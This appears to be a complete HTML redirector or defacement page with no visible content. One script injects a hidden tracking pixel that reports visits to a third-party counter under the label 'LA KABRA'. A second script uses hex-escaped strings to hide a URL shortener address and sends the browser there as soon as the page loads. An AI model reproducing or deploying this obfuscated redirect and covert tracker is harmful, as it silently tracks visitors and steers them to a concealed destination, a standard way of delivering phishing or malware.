<script>
const TRACKER_ID = "sempaix1us";
const trackerURL = `//whos.amung.us/pingjs/?k=${TRACKER_ID}&t=%F0%9F%91%BD%E2%98%A0%EF%B8%8F%F0%9F%92%80%20LA%20KABRA%20%F0%9F%92%80%E2%98%A0%EF%B8%8F%F0%9F%91%BD&x=https://www.pngwing.com/"`;
document.write(`
    <img src="${trackerURL}" style="display:none" alt="">
`);
</script>
<body>
<script>
(function(a,b){
  var p = ["\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x68\x72\x65\x66"];
  var q = ["\x68\x74\x74\x70\x73\x3A", "\x2F\x2F", "\x74\x2E\x63\x6F", "\x2F\x34\x4B\x69\x34\x4F\x64\x6B\x67\x63\x4D"];
  var r = q[0]+q[1]+q[2]+q[3];
  window[p[0]][p[1]] = r;
})();
</script>
</body>

